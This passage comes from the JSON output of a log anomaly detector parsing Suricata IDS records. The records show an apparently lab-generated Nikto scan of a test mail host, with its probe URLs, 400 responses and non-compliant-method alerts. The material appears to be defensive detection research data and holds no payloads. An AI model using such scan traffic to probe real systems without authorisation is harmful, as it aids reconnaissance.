"/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", 
"/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46952,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46952, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":583080449044546,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 583080449044546, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ 
"{\"timestamp\":\"2020-03-04T19:18:34.358924+0000\",\"flow_id\":583080449044546,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46952,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.de\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.de\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.36 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.361389 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46954 -> 192.168.10.154:80", "/parser/model/time": 1583349514.361389, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, 
"/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46954, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.361389 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46954 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.36 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.en", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.361649+0000\",\"flow_id\":570105352846820,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46954,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.en\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.en\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.361649, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": 
"\"flow_id\":570105352846820,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46954,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.en\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.en\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46954,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.en\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.en\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.en\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, 
"/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.en\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.en", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.en", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", 
"/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46954,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46954, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":570105352846820,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 570105352846820, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ 
"{\"timestamp\":\"2020-03-04T19:18:34.361649+0000\",\"flow_id\":570105352846820,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46954,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.en\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.en\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.36 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.365743 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46956 -> 192.168.10.154:80", "/parser/model/time": 1583349514.365743, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, 
"/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46956, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.365743 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46956 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.37 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.config", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.365913+0000\",\"flow_id\":776469941489987,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46956,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.config\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.config\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.365913, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", 
"/parser/model/flow_id": "\"flow_id\":776469941489987,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46956,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.config\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.config\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46956,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.config\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.config\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.config\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", 
"/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.config\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.config", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.config", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, 
"/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46956,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46956, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":776469941489987,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 776469941489987, 
"/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.365913+0000\",\"flow_id\":776469941489987,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46956,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.config\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.config\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.37 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.367902 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46958 -> 192.168.10.154:80", "/parser/model/time": 1583349514.367902, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command 
Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46958, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.367902 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46958 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.37 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.et", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.368167+0000\",\"flow_id\":829521377532493,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46958,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.et\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.et\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.368167, "/parser/model/plus_sign": "+", 
"/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":829521377532493,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46958,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.et\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.et\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46958,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.et\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.et\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.et\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", 